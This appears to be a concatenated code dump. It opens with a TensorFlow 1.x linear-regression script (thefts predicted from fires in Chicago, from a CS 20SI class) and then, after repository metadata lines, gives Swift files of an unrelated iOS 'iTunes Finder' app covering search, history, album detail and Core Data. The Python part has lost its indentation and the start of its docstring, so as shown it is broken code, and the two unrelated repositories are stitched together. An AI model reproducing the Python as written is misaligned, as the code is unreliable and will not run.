This program tries to predict the number of thefts from
the number of fire in the city of Chicago
Author: <NAME>
Prepared for the class CS 20SI: "TensorFlow for Deep Learning Research"
cs20si.stanford.edu
tensorboard --logdir
One variable 2 writer
https://github.com/tensorflow/tensorflow/issues/7089
"""
import os
# os.environ['TF_CPP_MIN_LOG_LEVEL']='2'
import datetime
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import csv
import io
import tensorflow as tf
tf.logging.set_verbosity(tf.logging.INFO)
print("Tensorflow version: " + tf.__version__)
print(datetime.date.today())
print(datetime.datetime.today().strftime('%Y-%m-%d-%H-%M'))
folderName = datetime.datetime.today().strftime('%Y-%m-%d-%H-%M')
print(folderName)
# exit(0)
DATA_FILE = './data/simple/fire.csv'
MODEL_FOLDER = './model/simple/' + folderName
SKIP_STEP = 10
print('debug: tensorboard --logdir ', MODEL_FOLDER)
# Step 1: read in data from the .xls file
'''
book = xlrd.open_workbook(DATA_FILE, encoding_override="utf-8")
sheet = book.sheet_by_index(0)
data = np.asarray([sheet.row_values(i) for i in range(1, sheet.nrows)])
n_samples = sheet.nrows - 1
'''
# reader = csv.reader(open(DATA_FILE, "rb"), delimiter=",")
# x = list(reader)
data = np.loadtxt(open(DATA_FILE, "rb"), delimiter=",", skiprows=1)
print(data)
n_samples = data.shape[0] - 1
print('Num of samples:', n_samples)
# exit(0)
'''
data = pd.read_csv(DATA_FILE)
print(data)
print(data.count)
print(data.shape[0])
n_samples = data.shape[0] - 1
print(n_samples)
'''
def gen_plot(d):
"""Create a pyplot plot and save to buffer."""
plt.figure()
plt.plot(d[:,0],d[:,1],'ro')
plt.title("Punti di interesse")
buf = io.BytesIO()
plt.savefig(buf, format='png')
buf.seek(0)
return buf
# Step 2: create placeholders for input X (number of fire) and label Y (number of theft)
with tf.name_scope("data_input"):
X = tf.placeholder(tf.float32, name='X')
Y = tf.placeholder(tf.float32, name='Y')
# Step 3: create weight and bias, initialized to 0
with tf.name_scope("data_input"):
w = tf.Variable(0.1, name='weights')
b = tf.Variable(0.1, name='bias')
# Step 4: build model to predict Y
Y_predicted = X * w + b
# Step 5: use the square error as the loss function
loss = tf.square(Y - Y_predicted, name='loss')
# loss = utils.huber_loss(Y, Y_predicted)
# Step 6: using gradient descent with learning rate of 0.01 to minimize loss
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)
# definisce variabili per TB
tf.summary.scalar("normal/loss", loss)
tf.summary.scalar("normal/current_w", w)
tf.summary.scalar("normal/current_b", b)
plot_buf = gen_plot(data)
image = tf.image.decode_png(plot_buf.getvalue(), channels=4)
# Add the batch dimension
image = tf.expand_dims(image, 0)
print(image)
tf.summary.image("Example_images", image)
tf.summary.text('tag1', tf.convert_to_tensor('Tag1: Random Text 1'))
# salva il modello
saver = tf.train.Saver() # defaults to saving all variables
with tf.Session() as sess:
# Step 7: initialize the necessary variables, in this case, w and b
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter(MODEL_FOLDER, sess.graph)
summaries = tf.summary.merge_all()
# Step 8: train the model
for index in range(500): # train the model 100 epochs (gira 50 volte il training sugli stessi dati)
total_loss = 0
for x, y in data:
# Session runs train_op and fetch values of loss
# print('feed {0}: {1}', x, y)
summary, _, l = sess.run([summaries, optimizer, loss], feed_dict={X: x, Y:y})
total_loss += l
# img1 = sess.run(image)
# print('Loss at step {}: {:5.1f}'.format(index, l))
# summary.value.add(tag="roc", simple_value = total_loss)
writer.add_summary(summary, global_step=index)
#if (index + 1) % SKIP_STEP == 0:
# print('Average loss at step {}: {:5.1f}'.format(index, total_loss / SKIP_STEP))
# total_loss = 0.0
# saver.save(sess, MODEL_FOLDER + '/chk-simple', index)
print('Epoch: {0}: total_loss/n_samples: {1}'.format(index, total_loss/n_samples))
# close the writer when you're done using it
writer.close()
# Step 9: output the values of w and b
w, b = sess.run([w, b])
# plot the results
print('Stampa risultato finale - plot')
X, Y = data.T[0], data.T[1]
plt.plot(X, Y, 'bo', label='Real data')
plt.plot(X, X * w + b, 'r', label='Predicted data')
plt.legend()
plt.show()
print('Operazioni Terminate')
|
a14384105641e7e04a908e34b407ff28556c587d
|
[
"Markdown",
"Python"
] | 15 |
Python
|
paulodiff/machine-learning
|
2cd73083e48faef44e0f4efc7a17af93fadee7b3
|
3ea1633d7a7395ce97a1c19b99d0ecd111095848
|
refs/heads/main
|
<file_sep>//
// AppDelegate.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
@UIApplicationMain
class AppDelegate: UIResponder {
// MARK: - Properties
var window: UIWindow?
private lazy var tabBarController: UITabBarController = {
let searchViewController = SearchConfigurator.configure()
searchViewController.tabBarItem.title = "Search"
searchViewController.tabBarItem.image = UIImage(named: "ic-tab-search")
let searchHistoryViewController = SearchHistoryConfigurator.configure()
searchHistoryViewController.tabBarItem.title = "History"
searchHistoryViewController.tabBarItem.image = UIImage(named: "ic-tab-history")
let tabBarController = UITabBarController()
tabBarController.viewControllers = [searchViewController, searchHistoryViewController]
tabBarController.view.tintColor = .systemPink
return tabBarController
}()
// MARK: - Methods
// Sets root UIViewController in the window.
private func setRootViewController() {
let window = UIWindow(frame: UIScreen.main.bounds)
window.rootViewController = tabBarController
window.makeKeyAndVisible()
self.window = window
}
}
// MARK: - UIApplicationDelegate
extension AppDelegate: UIApplicationDelegate {
func application(_ application: UIApplication, didFinishLaunchingWithOptions launchOptions: [UIApplication.LaunchOptionsKey: Any]?) -> Bool {
setRootViewController()
return true
}
}
<file_sep>//
// UIFont+Traits.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import UIKit
extension UIFont {
// MARK: - Public Methods
// Applies a bold font style.
func bold() -> UIFont {
return self.withSymbolicTraits(.traitBold)
}
// Applies an italic font style.
func italic() -> UIFont {
return self.withSymbolicTraits(.traitItalic)
}
// MARK: - Private Methods
// Takes the font we are extending and applies the specified traits to it.
// The size parameter in returning UIFont is set to zero, which means
// don’t change the font size from what it currently is.
private func withSymbolicTraits(_ symbolicTraits: UIFontDescriptor.SymbolicTraits) -> UIFont {
guard let fontDescriptor = fontDescriptor.withSymbolicTraits(symbolicTraits) else { return self }
let font = UIFont(descriptor: fontDescriptor, size: .zero)
return font
}
}
<file_sep>//
// SearchHistoryPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
import CoreData
protocol SearchHistoryViewProtocol: class {
func tableView(shouldSetUpdates state: Bool)
func tableView(shouldInsertRowsAt indexPath: [IndexPath])
func tableView(shouldMoveRowAt indexPath: IndexPath, to newIndexPath: IndexPath)
func tableView(shouldReloadRowsAt indexPath: [IndexPath])
func tableView(shouldDeleteRowsAt indexPath: [IndexPath])
}
protocol SearchHistoryPresenterProtocol {
init(view: SearchHistoryViewProtocol, router: SearchHistoryRouterProtocol)
func moveToSearchDetail(with album: Album)
}
final class SearchHistoryPresenter: NSObject, SearchHistoryPresenterProtocol {
// MARK: - Properties
private weak var view: SearchHistoryViewProtocol?
private let router: SearchHistoryRouterProtocol
private lazy var fetchedResultsController: NSFetchedResultsController<SearchItem> = {
let context = CoreDataStack.shared.viewContext
let fetchRequest: NSFetchRequest<SearchItem> = SearchItem.fetchRequest()
fetchRequest.fetchBatchSize = 24
let sortByCreatedDate = NSSortDescriptor(key: "createdDate", ascending: false)
fetchRequest.sortDescriptors = [sortByCreatedDate]
let fetchedResultsController = NSFetchedResultsController(fetchRequest: fetchRequest, managedObjectContext: context, sectionNameKeyPath: nil, cacheName: nil)
fetchedResultsController.delegate = self
do {
try fetchedResultsController.performFetch()
} catch let error {
print("Unable to fetch data: \(error.localizedDescription)")
}
return fetchedResultsController
}()
// MARK: - Initializers
init(view: SearchHistoryViewProtocol, router: SearchHistoryRouterProtocol) {
self.view = view
self.router = router
}
// MARK: - Methods
// Moves to the SearchDetail module.
func moveToSearchDetail(with album: Album) {
router.moveToSearchDetail(with: album)
}
}
// MARK: - UITableView Data Source
extension SearchHistoryPresenter: UITableViewDataSource {
func tableView(_ tableView: UITableView, numberOfRowsInSection section: Int) -> Int {
if let searchItems = fetchedResultsController.fetchedObjects {
return searchItems.count
}
return 0
}
func tableView(_ tableView: UITableView, cellForRowAt indexPath: IndexPath) -> UITableViewCell {
guard let cell = tableView.dequeueReusableCell(withIdentifier: SearchHistoryTableViewCell.identifier, for: indexPath) as? SearchHistoryTableViewCell else { return UITableViewCell() }
let model = fetchedResultsController.object(at: indexPath)
cell.configure(with: model)
return cell
}
}
// MARK: - UITableView Delegate
extension SearchHistoryPresenter: UITableViewDelegate {
func tableView(_ tableView: UITableView, didSelectRowAt indexPath: IndexPath) {
let searchItem = fetchedResultsController.object(at: indexPath)
if let query = searchItem.query {
router.moveToSearchResults(with: query)
}
tableView.deselectRow(at: indexPath, animated: true)
}
}
// MARK: - NSFetchedResultsController Delegate
extension SearchHistoryPresenter: NSFetchedResultsControllerDelegate {
func controllerWillChangeContent(_ controller: NSFetchedResultsController<NSFetchRequestResult>) {
view?.tableView(shouldSetUpdates: true)
}
func controller(_ controller: NSFetchedResultsController<NSFetchRequestResult>, didChange anObject: Any, at indexPath: IndexPath?, for type: NSFetchedResultsChangeType, newIndexPath: IndexPath?) {
switch type {
case .insert:
if let newIndexPath = newIndexPath {
view?.tableView(shouldInsertRowsAt: [newIndexPath])
}
case .move:
if let indexPath = indexPath, let newIndexPath = newIndexPath {
view?.tableView(shouldMoveRowAt: indexPath, to: newIndexPath)
}
case .update:
if let indexPath = indexPath {
view?.tableView(shouldReloadRowsAt: [indexPath])
}
case .delete:
if let indexPath = indexPath {
view?.tableView(shouldDeleteRowsAt: [indexPath])
}
default:
break
}
}
func controllerDidChangeContent(_ controller: NSFetchedResultsController<NSFetchRequestResult>) {
view?.tableView(shouldSetUpdates: false)
}
}
<file_sep>//
// SearchDetailViewController.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SearchDetailViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchDetailPresenterProtocol?
// MARK: - Private Properties
private lazy var tableView: UITableView = {
let tableView = UITableView(frame: .zero, style: .grouped)
tableView.alpha = 0
tableView.register(AlbumTableViewHeader.self, forHeaderFooterViewReuseIdentifier: AlbumTableViewHeader.identifier)
tableView.register(SongTableViewCell.self, forCellReuseIdentifier: SongTableViewCell.identifier)
tableView.translatesAutoresizingMaskIntoConstraints = false
tableView.allowsSelection = false
if #available(iOS 13.0, *) {
tableView.backgroundColor = .systemBackground
} else {
tableView.backgroundColor = .white
}
tableView.dataSource = presenter as? UITableViewDataSource
tableView.delegate = presenter as? UITableViewDelegate
return tableView
}()
private lazy var activityIndicatorView: UIActivityIndicatorView = {
let activityIndicatorView = UIActivityIndicatorView()
activityIndicatorView.startAnimating()
activityIndicatorView.hidesWhenStopped = true
activityIndicatorView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
activityIndicatorView.style = .large
} else {
activityIndicatorView.style = .gray
}
return activityIndicatorView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
presenter?.fetchSongs()
}
}
// MARK: - Visual Appearance
extension SearchDetailViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
configureNavigationTitle()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
// Configures a title in the navigation bar.
private func configureNavigationTitle() {
self.navigationItem.title = "Album Info"
self.navigationItem.largeTitleDisplayMode = .never
}
}
// MARK: - Layout
extension SearchDetailViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureActivityIndicatorView()
configureTableView()
}
// Configures an activity indicator to display loading process.
private func configureActivityIndicatorView() {
self.view.addSubview(activityIndicatorView)
// Setting up constraints
activityIndicatorView.centerXToSuperview()
activityIndicatorView.centerYToSuperview()
}
// Configures a table view to display search history.
private func configureTableView() {
self.view.addSubview(tableView)
// Setting up constraints
tableView.horizontalToSuperview()
tableView.verticalToSuperview(usingSafeArea: true)
}
}
// MARK: - SearchDetailPresenter Delegate
extension SearchDetailViewController: SearchDetailViewProtocol {
// Reloads the table view with a new data.
func shouldReloadData() {
DispatchQueue.main.async { [weak self] in
self?.tableView.reloadData()
// Animating presentation of the table view
UIView.animate(withDuration: 0.25, delay: 0.25, options: .curveEaseInOut) {
self?.tableView.alpha = 1
} completion: { _ in
self?.activityIndicatorView.stopAnimating()
}
}
}
}
<file_sep>//
// Database.swift
// iTunes Finder
//
// Created by <NAME> on 28.12.2020.
//
import Foundation
final class Database {
// MARK: - Properties
static let shared = Database()
// MARK: - Methods
// Saves a search query to Core Data.
func save(query: String) {
CoreDataStack.shared.save { context in
let createdDate = Date()
_ = SearchItem(query: query, createdDate: createdDate, context: context)
}
}
}
<file_sep>//
// SearchResultsPresenter.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchResultsViewProtocol: class {
func shouldReloadData()
func shouldPresent(album: Album)
}
protocol SearchResultsPresenterProtocol {
init(view: SearchResultsViewProtocol, router: SearchResultsRouterProtocol)
}
final class SearchResultsPresenter: NSObject, SearchResultsPresenterProtocol {
// MARK: - Properties
private weak var view: SearchResultsViewProtocol?
private let router: SearchResultsRouterProtocol
private let throttler = Throttler(delay: 0.5)
private var albums: [Album] = [] {
didSet {
view?.shouldReloadData()
}
}
// MARK: - Initializers
init(view: SearchResultsViewProtocol, router: SearchResultsRouterProtocol) {
self.view = view
self.router = router
}
convenience init(view: SearchResultsViewProtocol, router: SearchResultsRouterProtocol, query: String) {
self.init(view: view, router: router)
search(text: query)
}
// MARK: - Methods
// Send a delayed search query and display the new data in the collection.
func search(text query: String) {
throttler.throttle { [weak self] in
Database.shared.save(query: query)
DataProvider.shared.get(albumsWithName: query) { result in
switch result {
case .success(let albums):
// Setting albums sorted by release date
self?.albums = albums.sorted { (a, b) -> Bool in
return a.releaseDate > b.releaseDate
}
case .failure(let error):
// Presenting an error message if something went wrong
DispatchQueue.main.async {
self?.router.presentAlert(title: "Error", message: error.localizedDescription)
}
}
}
}
}
}
// MARK: - UICollectionView Data Source
extension SearchResultsPresenter: UICollectionViewDataSource {
func collectionView(_ collectionView: UICollectionView, numberOfItemsInSection section: Int) -> Int {
return albums.count
}
func collectionView(_ collectionView: UICollectionView, cellForItemAt indexPath: IndexPath) -> UICollectionViewCell {
guard let cell = collectionView.dequeueReusableCell(withReuseIdentifier: AlbumCollectionViewCell.identifier, for: indexPath) as? AlbumCollectionViewCell else { return UICollectionViewCell() }
// Configuring the cell with data from the model
let album = albums[indexPath.row]
cell.configure(with: album)
return cell
}
}
// MARK: - UICollectionView Delegate Flow Layout
extension SearchResultsPresenter: UICollectionViewDelegateFlowLayout {
func collectionView(_ collectionView: UICollectionView, layout collectionViewLayout: UICollectionViewLayout, sizeForItemAt indexPath: IndexPath) -> CGSize {
guard let collectionViewLayout = collectionView.collectionViewLayout as? UICollectionViewFlowLayout else { return CGSize(width: 50, height: 50) }
// Getting collection view's layout insets
let sectionInsets = collectionViewLayout.sectionInset.left + collectionViewLayout.sectionInset.right
let interitemSpacing = collectionViewLayout.minimumInteritemSpacing
let insets = sectionInsets + interitemSpacing
// Make calculations of cell size to fit 2 cells in a single row
let viewWidth = collectionView.bounds.size.width
let estimatedItemSize = (viewWidth - insets) / 2
let size = CGSize(width: estimatedItemSize, height: estimatedItemSize)
return size
}
func collectionView(_ collectionView: UICollectionView, didSelectItemAt indexPath: IndexPath) {
// Presents a SearchDetail module with the selected album
let album = albums[indexPath.row]
view?.shouldPresent(album: album)
}
}
// MARK: - UISearchResultsUpdating
extension SearchResultsPresenter: UISearchResultsUpdating {
func updateSearchResults(for searchController: UISearchController) {
guard let query = searchController.searchBar.text, query.isNotEmpty else { return }
search(text: query)
}
}
<file_sep>//
// SearchItem+Init.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import CoreData
extension SearchItem {
// Initializes the model by taking all required properties during initialization.
convenience init(query: String, createdDate: Date, context: NSManagedObjectContext) {
self.init(context: context)
self.query = query
self.createdDate = createdDate
}
}
<file_sep>//
// String+Validation.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import Foundation
extension String {
// Verifies that a given string has a value.
var isNotEmpty: Bool {
let trimmedString = self.trimmingCharacters(in: .whitespacesAndNewlines)
if trimmedString.isEmpty {
return false
} else {
return true
}
}
}
<file_sep>//
// SearchDetailRouter.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
protocol SearchDetailRouterProtocol {
init(view: UIViewController)
func presentAlert(title: String, message: String)
}
final class SearchDetailRouter: SearchDetailRouterProtocol {
// MARK: - Properties
private weak var view: UIViewController?
// MARK: - Initializers
init(view: UIViewController) {
self.view = view
}
// MARK: - Methods
// Presents an alert with title and message.
func presentAlert(title: String, message: String) {
guard let view = view as? SearchDetailViewController else { return }
let action = UIAlertAction(title: "Done", style: .default)
let alertController = UIAlertController(title: title, message: message, preferredStyle: .alert)
alertController.addAction(action)
view.present(alertController, animated: true)
}
}
<file_sep>//
// SearchDetailConfigurator.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SearchDetailConfigurator {
static func configure(with album: Album) -> UIViewController {
let view = SearchDetailViewController()
let router = SearchDetailRouter(view: view)
let presenter = SearchDetailPresenter(view: view, router: router, album: album)
view.presenter = presenter
return view
}
}
<file_sep>//
// PlaceholderView.swift
// iTunes Finder
//
// Created by <NAME> on 27.12.2020.
//
import UIKit
final class PlaceholderView: UIView {
// MARK: - Properties
private let imageView: UIImageView = {
let imageView = UIImageView()
imageView.contentMode = .scaleAspectFit
imageView.translatesAutoresizingMaskIntoConstraints = false
return imageView
}()
private let titleLabel: UILabel = {
let titleLabel = UILabel()
titleLabel.font = UIFont.preferredFont(forTextStyle: .title2).bold()
titleLabel.textAlignment = .center
titleLabel.numberOfLines = 1
titleLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
titleLabel.textColor = .label
} else {
titleLabel.textColor = .black
}
return titleLabel
}()
private let subtitleLabel: UILabel = {
let subtitleLabel = UILabel()
subtitleLabel.font = .preferredFont(forTextStyle: .body)
subtitleLabel.textAlignment = .center
subtitleLabel.numberOfLines = 3
subtitleLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
subtitleLabel.textColor = .label
} else {
subtitleLabel.textColor = .black
}
return subtitleLabel
}()
// MARK: - Initializers
override init(frame: CGRect) {
super.init(frame: frame)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
init(image: UIImage?, title: String, subtitle: String) {
self.init()
self.imageView.image = image
self.titleLabel.text = title
self.subtitleLabel.text = subtitle
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureTitleLabel()
configureSubtitleLabel()
configureImageView()
}
// Configures a label with placeholder title.
private func configureTitleLabel() {
self.addSubview(titleLabel)
// Setting up constraints
titleLabel.centerYToSuperview()
titleLabel.horizontalToSuperview(insets: .horizontal(32))
}
// Configures a label with placeholder subtitle.
private func configureSubtitleLabel() {
self.addSubview(subtitleLabel)
// Setting up constraints
subtitleLabel.topToBottom(of: titleLabel, offset: 8)
subtitleLabel.horizontalToSuperview(insets: .horizontal(32))
}
// Configures an image view for placeholder image.
private func configureImageView() {
self.addSubview(imageView)
// Setting up constraints
imageView.horizontalToSuperview(insets: .horizontal(32))
imageView.bottomToTop(of: titleLabel, offset: -16)
imageView.aspectRatio(2 / 1)
}
}
<file_sep>//
// SearchViewController.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
import TinyConstraints
final class SearchViewController: UIViewController {
// MARK: - Public Properties
var presenter: SearchPresenterProtocol?
// MARK: - Private Properties
private lazy var placeholderView: PlaceholderView = {
let image = UIImage(named: "search-placeholder")
let title = "What're you looking for?"
let subtitle = "Search by iTunes Database"
let placeholderView = PlaceholderView(image: image, title: title, subtitle: subtitle)
if #available(iOS 13.0, *) {
placeholderView.backgroundColor = .systemBackground
} else {
placeholderView.backgroundColor = .white
}
return placeholderView
}()
// MARK: - UIViewController Events
override func viewDidLoad() {
super.viewDidLoad()
configureVisualAppearance()
configureViews()
}
}
// MARK: - Visual Appearance
extension SearchViewController {
// Groups all methods that are configuring the view’s visual appearance.
private func configureVisualAppearance() {
configureColors()
configureNavigationTitle()
}
// Configures colors.
private func configureColors() {
// Setting up .systemBackground for the view's backgroundColor
// to support dark theme in iOS 13 or newer
if #available(iOS 13.0, *) {
self.view.backgroundColor = .systemBackground
} else {
self.view.backgroundColor = .white
}
self.view.tintColor = .systemPink
}
// Configures a title in the navigation bar.
private func configureNavigationTitle() {
// Asking the navigation bar to display a title using a larger font if it possible
if let navigationController = self.navigationController {
navigationController.navigationBar.prefersLargeTitles = true
}
self.navigationItem.title = "Search"
}
}
// MARK: - Layout
extension SearchViewController {
// Groups all methods that are configuring the view.
private func configureViews() {
configureSearchBar()
configurePlaceholderView()
}
// Configures a search bar in the navigation bar.
private func configureSearchBar() {
// Setting up the search controller with the search results controller
guard let searchResultsController = SearchResultsConfigurator.configure() as? SearchResultsViewController else { return }
searchResultsController.delegate = self
let searchController = UISearchController(searchResultsController: searchResultsController)
searchController.searchResultsUpdater = searchResultsController.presenter as? UISearchResultsUpdating
// Setting up the search bar
searchController.searchBar.autocapitalizationType = .words
searchController.searchBar.placeholder = "Artists, songs, or albums"
searchController.searchBar.tintColor = .systemPink
self.navigationItem.searchController = searchController
self.navigationItem.hidesSearchBarWhenScrolling = false
}
// Configures a placeholder view.
private func configurePlaceholderView() {
self.view.addSubview(placeholderView)
// Setting up constraints
placeholderView.horizontalToSuperview()
placeholderView.verticalToSuperview()
}
}
// MARK: - SearchPresenter Delegate
extension SearchViewController: SearchViewProtocol {}
// MARK: - SearchResultsViewController Delegate
extension SearchViewController: SearchResultsViewControllerDelegate {
// Asks the presenter move to the SearchDetail module.
func searchResults(didSelect album: Album) {
presenter?.moveToSearchDetail(with: album)
}
}
<file_sep>//
// SearchRouter.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
protocol SearchRouterProtocol {
init(view: UIViewController)
func moveToSearchDetail(with album: Album)
}
final class SearchRouter: SearchRouterProtocol {
// MARK: - Properties
private weak var view: UIViewController?
// MARK: - Initializers
init(view: UIViewController) {
self.view = view
}
// MARK: - Methods
// Moves view to a SearchDetail module.
func moveToSearchDetail(with album: Album) {
guard let view = view, let navigationController = view.navigationController else { return }
let viewController = SearchDetailConfigurator.configure(with: album)
navigationController.pushViewController(viewController, animated: true)
}
}
<file_sep>//
// SongTableViewCell.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
final class SongTableViewCell: UITableViewCell, ConfigurableView {
// MARK: - Public Properties
static let identifier = "SongTableViewCell"
// MARK: - Private Properties
private let nameLabel: UILabel = {
let nameLabel = UILabel()
nameLabel.font = UIFont.preferredFont(forTextStyle: .body)
nameLabel.numberOfLines = 1
nameLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
nameLabel.textColor = .label
} else {
nameLabel.textColor = .black
}
return nameLabel
}()
// MARK: - Initializers
override init(style: UITableViewCell.CellStyle, reuseIdentifier: String?) {
super.init(style: style, reuseIdentifier: reuseIdentifier)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: Song) {
nameLabel.text = model.name
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureNameLabel()
}
// Configures a label.
private func configureNameLabel() {
self.addSubview(nameLabel)
// Setting up constraints
nameLabel.centerYToSuperview()
nameLabel.horizontalToSuperview(insets: .horizontal(20))
}
}
<file_sep>//
// AlbumTableViewHeader.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import UIKit
import Nuke
import TinyConstraints
final class AlbumTableViewHeader: UITableViewHeaderFooterView, ConfigurableView {
// MARK: - Public Properties
static let identifier = "AlbumTableViewHeader"
// MARK: - Private Properties
private let artworkImageView: UIImageView = {
let artworkImageView = UIImageView()
artworkImageView.contentMode = .scaleAspectFit
artworkImageView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
artworkImageView.backgroundColor = .systemGray6
} else {
artworkImageView.backgroundColor = UIColor(red: 0.95, green: 0.95, blue: 0.97, alpha: 1.00)
}
return artworkImageView
}()
private let activityIndicatorView: UIActivityIndicatorView = {
let activityIndicatorView = UIActivityIndicatorView()
activityIndicatorView.startAnimating()
activityIndicatorView.hidesWhenStopped = true
activityIndicatorView.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
activityIndicatorView.style = .medium
} else {
activityIndicatorView.style = .gray
}
return activityIndicatorView
}()
private let nameLabel: UILabel = {
let nameLabel = UILabel()
nameLabel.font = UIFont.preferredFont(forTextStyle: .title1).bold()
nameLabel.numberOfLines = 2
nameLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
nameLabel.textColor = .label
} else {
nameLabel.textColor = .black
}
return nameLabel
}()
private let artistNameLabel: UILabel = {
let artistNameLabel = UILabel()
artistNameLabel.font = UIFont.preferredFont(forTextStyle: .body)
artistNameLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
artistNameLabel.textColor = .label
} else {
artistNameLabel.textColor = .black
}
return artistNameLabel
}()
private let priceLabel: UILabel = {
let priceLabel = UILabel()
priceLabel.font = UIFont.preferredFont(forTextStyle: .footnote)
priceLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
priceLabel.textColor = .secondaryLabel
} else {
priceLabel.textColor = .gray
}
return priceLabel
}()
private let currencyLabel: UILabel = {
let currencyLabel = UILabel()
currencyLabel.font = UIFont.preferredFont(forTextStyle: .footnote)
currencyLabel.translatesAutoresizingMaskIntoConstraints = false
if #available(iOS 13.0, *) {
currencyLabel.textColor = .secondaryLabel
} else {
currencyLabel.textColor = .gray
}
return currencyLabel
}()
// MARK: - Initializers
override init(reuseIdentifier: String?) {
super.init(reuseIdentifier: reuseIdentifier)
configureViews()
}
required init?(coder: NSCoder) {
super.init(coder: coder)
configureViews()
}
// MARK: - Public Methods
// Configures a cell with data from a model.
func configure(with model: Album) {
// Loading an album artwork image
if let url = URL(string: model.artworkUrl) {
let options = ImageLoadingOptions(transition: .fadeIn(duration: 0.33))
Nuke.loadImage(with: url, options: options, into: artworkImageView) { [weak self] _ in
self?.activityIndicatorView.stopAnimating()
}
}
// Setting content
nameLabel.text = model.name
artistNameLabel.text = model.artistName
priceLabel.text = model.price
currencyLabel.text = model.currency
}
// MARK: - Layout
// Groups all methods that are configuring the view.
private func configureViews() {
configureContentView()
configureArtworkImageView()
configureActivityIndicatorView()
configureNameLabel()
configureArtistNameLabel()
configurePriceView()
}
// Configures a content view.
private func configureContentView() {
self.contentView.verticalToSuperview()
self.contentView.horizontalToSuperview()
}
// Configures an image view for an album artwork image.
private func configureArtworkImageView() {
self.contentView.addSubview(artworkImageView)
// Setting up constraints
self.contentView.top(to: artworkImageView, offset: -20)
artworkImageView.leftToSuperview(offset: 20)
artworkImageView.widthToSuperview(multiplier: 0.5)
artworkImageView.aspectRatio(1)
}
// Configures an activity indicator to display an image loading process.
private func configureActivityIndicatorView() {
self.contentView.addSubview(activityIndicatorView)
// Setting up constraints
activityIndicatorView.centerX(to: artworkImageView)
activityIndicatorView.centerY(to: artworkImageView)
}
// Configures a label to display an album name.
private func configureNameLabel() {
self.contentView.addSubview(nameLabel)
// Setting up constraints
nameLabel.topToBottom(of: artworkImageView, offset: 16)
nameLabel.horizontalToSuperview(insets: .horizontal(20))
}
// Configures a label to display an artist name of the album.
private func configureArtistNameLabel() {
self.contentView.addSubview(artistNameLabel)
// Setting up constraints
artistNameLabel.topToBottom(of: nameLabel, offset: 8)
artistNameLabel.horizontalToSuperview(insets: .horizontal(20))
}
// Configures a view to display an album price.
private func configurePriceView() {
// Creating a Stack View for placing a price labels
let priceStackView = UIStackView()
priceStackView.axis = .horizontal
priceStackView.alignment = .center
priceStackView.distribution = .fill
priceStackView.spacing = 4
priceStackView.translatesAutoresizingMaskIntoConstraints = false
self.contentView.addSubview(priceStackView)
// Placing labels in the Stack View
priceStackView.addArrangedSubview(priceLabel)
priceStackView.addArrangedSubview(currencyLabel)
// Setting up constraints
priceLabel.setContentHuggingPriority(.defaultHigh, for: .horizontal)
currencyLabel.setContentHuggingPriority(.defaultLow, for: .horizontal)
priceStackView.topToBottom(of: artistNameLabel, offset: 8)
priceStackView.horizontalToSuperview(insets: .horizontal(20))
self.contentView.bottom(to: priceStackView, offset: 16)
}
}
<file_sep>//
// SearchConfigurator.swift
// iTunes Finder
//
// Created by <NAME> on 25.12.2020.
//
import UIKit
final class SearchConfigurator {
static func configure() -> UIViewController {
let view = SearchViewController()
let navigationController = UINavigationController(rootViewController: view)
let router = SearchRouter(view: view)
let presenter = SearchPresenter(view: view, router: router)
view.presenter = presenter
return navigationController
}
}
<file_sep>//
// ConfigurableView.swift
// iTunes Finder
//
// Created by <NAME> on 26.12.2020.
//
import Foundation
protocol ConfigurableView {
associatedtype ConfigurationModel
func configure(with model: ConfigurationModel)
}
<file_sep>//
// ParsableModel.swift
// iTunes Finder
//
// Created by <NAME> on 30.12.2020.
//
import Foundation
protocol ParsableModel {
init?(data: Dictionary<String, Any>)
}
<file_sep>//
// SearchResultsViewController.swift
// iTunes Finder
//
